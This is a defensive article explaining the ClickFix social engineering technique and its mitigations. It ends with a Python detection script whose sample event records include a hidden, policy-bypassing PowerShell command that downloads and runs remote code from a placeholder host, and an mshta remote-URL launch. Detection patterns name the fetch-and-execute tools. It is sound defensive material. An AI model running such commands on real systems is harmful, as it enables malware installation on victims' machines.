Infosecurity Europe
2-4 June 2026
ExCeL London

What is ClickFix and How to Prevent It

ClickFix is a relatively new social engineering technique that is popular among threat actors, with a reported 517% surge in 2025, according to ESET data.

Sometimes referred to as ClearFix, the technique was first detected in April 2024 in campaigns conducted by an initial access broker tracked by Proofpoint as TA571.

It quickly gained popularity in 2024, with a wide range of malware being delivered using this method, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, Matanbuchus and NetSupport.

How Threat Actors Use ClickFix

ClickFix is a deceptive social engineering technique used by cybercriminals to manipulate victims into clicking on malicious links or downloading harmful files.

Unlike traditional phishing, which often relies on poorly crafted emails, ClickFix employs psychological tricks to create a sense of urgency, fear or curiosity, making victims more likely to act without thinking.

Attackers disguise their malicious content as legitimate notifications, software updates or security alerts, exploiting human instincts rather than technical vulnerabilities.

The Initial Hook: Crafting a Convincing Lure

Threat actors begin by designing a message that appears trustworthy and urgent. This could be an email, a pop-up ad, a social media message or even a fake system alert.

The goal is to make the victim believe that immediate action is necessary. For example, a user might see a notification claiming their bank account has been compromised or that their computer is infected with malware.

These messages often mimic real communications from well-known companies, government agencies or tech support services, making them harder to distinguish from legitimate alerts.

Other known scenarios include:

  • Browser unable to display the page, need to refresh the browser
  • Error loading a document on a website
  • Error opening a document from an email
  • Problems with the microphone and camera in Google Meet or Zoom
  • Users asked to prove that they are not a robot (fake CAPTCHA)

Psychological Manipulation: Creating a False Sense of Urgency

Once the victim encounters the message, the attacker uses psychological pressure to push them into clicking.

This could involve threats of account suspension, warnings of data loss or promises of rewards.

In most cases, the language is carefully crafted to bypass rational thinking, with phrases like "Act now to secure your account!" or "Your system is at risk!", thus triggering an emotional response and making the victim more likely to comply without questioning the source.

The Deceptive "Fix": Delivering the Malicious Payload

This technique is referred to as ClickFix because usually the notification contains a button enticing the user to ‘fix’ the situation – but some ClickFix schemes don’t use this element.

When the victim clicks the link or performs the action that is supposed to resolve the problem (e.g. downloading a file), the attack moves to the next stage.

Instead of providing the promised solution, the malicious payload is delivered. This could take several forms:

  • Drive-by downloads: The victim is redirected to a compromised website that automatically installs malware without their knowledge
  • Fake software installers: The victim is tricked into downloading what appears to be a legitimate program (like a browser update or antivirus tool), but it actually contains malware
  • Credential harvesting: The victim is directed to a fake login page where their username and password are stolen
  • Exploiting system vulnerabilities: Some ClickFix attacks use scripts (such as PowerShell commands) to execute malware directly on the victim’s machine

Post-Exploitation: What Happens After the Click?

Once the malware is installed or credentials are stolen, the attacker can take various malicious actions:

  • Persistent access: The attacker installs backdoors or remote access tools to maintain control over the victim’s system for future attacks
  • Lateral movement: If the victim is part of an organization, the malware may spread to other devices on the same network, increasing the damage
  • Ransomware deployment: The victim’s files are encrypted and a ransom demand is made for their release
  • Data theft: Sensitive information, such as passwords, financial details or personal files, is extracted and sent to the attacker

Fight Back: How to Mitigate ClickFix

To effectively prevent and mitigate the ClickFix threat, organizations need to raise awareness about this type of social engineering tactic among their workforce, with a particular emphasis on the importance of questioning unexpected prompts and verifying legitimacy before executing commands.

Just like with most cyber threats, organizations also need to keep their systems (software, browsers, etc.) up to date and respect basic security measures.

However, there are some specific measures organizations can take to mitigate threats like ClickFix and its variants:

  • Monitor and log activity: Implement logging for the Run dialog and clipboard activities through Windows Event Viewer. Set up alerts for suspicious commands executed through user accounts
  • Restrict use of the Run dialog and clipboard: Utilize Group Policy Objects (GPOs) to disable or limit access to the Windows Run dialog (Win + R) and restrict clipboard functionality to prevent unauthorized commands
  • Restrict execution of potentially malicious executables: Block execution of commonly exploited binaries such as mshta.exe and powershell.exe from user directories to prevent the execution of potential malware delivered via ClickFix
  • Block Malvertising: Employ solutions that can block malvertising and the display of deceptive ads, which may serve as distribution points for ClickFix campaigns
  • Secure software and browser environments: Employ advanced URL filtering to block access to known malicious sites and redirect users away from compromised websites
  • Implement multifactor authentication (MFA)
  • Deploy advanced security tools (e.g. EDR, IDS, UEBA)
  • Develop and maintain a robust incident response plan that includes procedures specific to handling ClickFix incidents
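The first three measures above (logging, restricting the Run dialog, and blocking interpreters launched from user directories) all come down to recognising one execution pattern: a script interpreter such as powershell.exe or mshta.exe started from the interactive shell with a command line that hides its window, bypasses the execution policy, or fetches and evaluates remote content. The following Python script is an added example, written for this article rather than taken from it or from ESET or Proofpoint, showing how an alert rule for that pattern can be scored. The field names follow Security Event ID 4688 (the CommandLine field is only populated when the "Include command line in process creation events" policy is enabled); the event records are constructed sample data, not real telemetry, and example.invalid is a placeholder host. The same logic maps directly onto a SIEM rule or a Get-WinEvent query.

```python
"""Score Windows process-creation records for the ClickFix execution pattern.

Added example for the article above. Records are constructed samples shaped
like Security Event ID 4688 (or Sysmon Event ID 1); nothing here is real telemetry.
"""
import re

# Interpreters an attacker relies on when a victim pastes a command into Win+R.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# explorer.exe is the parent of anything launched through the Run dialog.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# (rule name, weight, regex over the lower-cased command line)
RULES = [
    ("hidden-window",      2, re.compile(r"-w(?:indowstyle)?\s+hidden")),
    ("exec-policy-bypass", 2, re.compile(r"-e(?:xecutionpolicy|p)\s+bypass")),
    ("encoded-command",    2, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}")),
    ("remote-fetch",       3, re.compile(r"(?:https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b)")),
    ("inline-eval",        2, re.compile(r"\b(?:iex|invoke-expression)\b")),
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one 4688-style record; 0 for non-interpreters."""
    if basename(ev["NewProcessName"]) not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    parent = basename(ev["ParentProcessName"])
    if parent in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append(f"launched from {parent} (Run dialog or desktop)")
    # Interpreter copied into a user-writable location (what the GPO/WDAC rule blocks).
    if "\\users\\" in ev["NewProcessName"].lower():
        score += 3
        reasons.append("interpreter running from a user directory")
    cmd = ev["CommandLine"].lower()
    for name, weight, rx in RULES:
        if rx.search(cmd):
            score += weight
            reasons.append(name)
    return score, reasons


def detect(events: list[dict], threshold: int = 4) -> list[dict]:
    """Return alert records for every event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"user": ev["SubjectUserName"],
                           "image": ev["NewProcessName"],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample records (not real logs). Order matters for the usage below.
PS_SYS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"SubjectUserName": "alice", "NewProcessName": PS_SYS,
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/fix)"'},
    {"SubjectUserName": "bob", "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/captcha"},
    {"SubjectUserName": "alice", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},                      # ordinary, stays below threshold
    {"SubjectUserName": "SYSTEM", "NewProcessName": PS_SYS,
     "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"SubjectUserName": "carol",
     "NewProcessName": r"C:\Users\carol\AppData\Local\Temp\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -c Get-Date"},  # interpreter in a user directory
    {"SubjectUserName": "alice", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},  # not an interpreter
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['score']:>2}] {alert['user']}: {alert['image']}")
        for reason in alert["reasons"]:
            print(f"      - {reason}")
```

With the threshold at 4, a plain `cmd /c dir` from Explorer and a scheduled task that legitimately uses `-ExecutionPolicy Bypass` stay quiet, while the Run-dialog PowerShell and mshta launches and the interpreter copied into a user profile are all reported. The weights are a starting point to tune against your own baseline of Explorer-spawned interpreters before wiring the rule into an alert.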
